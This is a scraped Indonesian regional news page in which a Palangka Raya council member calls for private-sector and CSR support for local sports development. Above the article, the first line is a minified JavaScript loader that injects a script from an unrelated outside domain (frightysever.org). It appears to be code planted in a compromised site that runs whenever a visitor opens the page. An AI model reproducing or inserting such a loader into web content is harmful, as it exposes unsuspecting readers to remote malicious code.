(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DPRD Kota Palangka Raya

Komisi C DPRD Palangka Raya: Pembinaan Olahraga Perlu Dukungan Swasta


KANALKALIMANTAN.COM, PALANGKA RAYA – Anggota Komisi C DPRD Palangka Raya, Sigit Widodo mengatakan, pentingnya peran pihak swasta untuk memberikan support dan dukungan terhadap pembinaan olahraga di Kota Palangka Raya.

Tidaklah berlebih ungkap Sigit, para atlet muda yang dimiliki Kota Palangka Raya, secara kualitas dan kemampuan tidaklah kalah dengan atlet daerah lain.

“Hanya tinggal memerlukan dukungan banyak pihak. Salah satunya dukungan dari pihak swasta dalam berbagai aspek pembinaan dan dukungan ,”ungkapnya.

Lebih jauh politikus muda PDI Perjuangan di Kota Palangka Raya ini menilai, jika sejauh ini support dari pihak swasta sangat minim. Namun demikian bisa dipahami, karena Palangka Raya memang tidak ada perusahan besar seperti perkebunan, pertambangan, kehutanan dan lain sebagainya.

 

Baca juga: Dewan Dorong Pemko Palangka Raya Optimalkan Pengembangan Wisata Unggulan

Sejauh ini pembinaan atlet hanya berharap dari para ketua cabang olahraga (cabor) yang punya kepedulian, maupun dari Pemerintah Kota Palangka Raya bersama pihak KONI.

Karena itulah, pentingnya dukungan pihak swasta tidak lain untuk mendukung regenerasi dan kaderisasi atlet-atlet potensial, seperti pihak swasta seperti BUMD, setidaknya bisa menyisihkan dana Corporate Social Responsibilty (CSR) untuk menyokong pengembangan sektor olahraga.

Padahal sejatinya imbuh dia, peran swasta sudah sewajarnya tidak hanya berkutat mendukung pembangunan infrastruktur, namun lebih dari itu, salah satunya mendukung pembangunan sumber daya manusia (SDM). Terutama kepada atlet olahraga berprestasi.

“Bila ada sokongan dari pihak swasta, katakan saja menaungi dan membina salah satu cabang olahraga, maka sudah menunjukan kontribusi terhadap dunia olahraga di Kota Palangka Raya,” pungkasnya.(Kanalkalimantan.com/kk)

Reporter: kk
Editor: cell


Al Ghifari

Recent Posts

Silaturahmi Camat Lurah RT RW, Paman Birin Cerita Pernah Jadi Lurah dan Sekcam

KANALKALIMANTAN.COM, BANJARMASIN - Gubernur Kalimantan Selatan (Kalsel) H Sahbirin Noor bercerita perjalanan karirnya sebelum menjadi… Read More

3 jam ago

APILL Terpasang di Samsat Banjarbaru, Dua Jalan Jadi Perempatan

DPUPR Banjarbaru akan Bongkar Median Sepanjang 35 Meter Read More

3 jam ago

Chaos Banjarmasin di Atas Kanvas, Tragedi Kelam Jumat Kelabu 23 Mei 1997

“Setiap goresan kuas di lukisan ini, saya terbayang, merasakan terbawa kedalam suasana, di saat kerusuhan… Read More

7 jam ago

Perpisahan Siswa SMAN 1 Kapuas, Erlin Hardi : Belajar, Belajar, dan Belajar!

KANALKALIMANTAN.COM, KUALA KAPUAS - Pendidikan merupakan tolak ukur kemajuan suatu bangsa. Dengan pendidikan yang baik… Read More

8 jam ago

Nilai Posisi Waspada, Pemkab Kapuas Gelar Rakor SPI MCP dan LHKPN

KANALKALIMANTAN.COM, KUALA KAPUAS - Pemerintah Kabupaten (Pemkab) Kapuas melalui Inspektorat melaksanakan rapat koordinasi (Rakor) terkait… Read More

9 jam ago

LITERASI EMOSIONAL DI MEDIA SOSIAL: MENGELOLA EMOSI DAN INTERAKSI ONLINE

"WEBINAR INDONESIA MAKIN CAKAP DIGITAL" WILAYAH KALIMANTAN Read More

10 jam ago

This website uses cookies.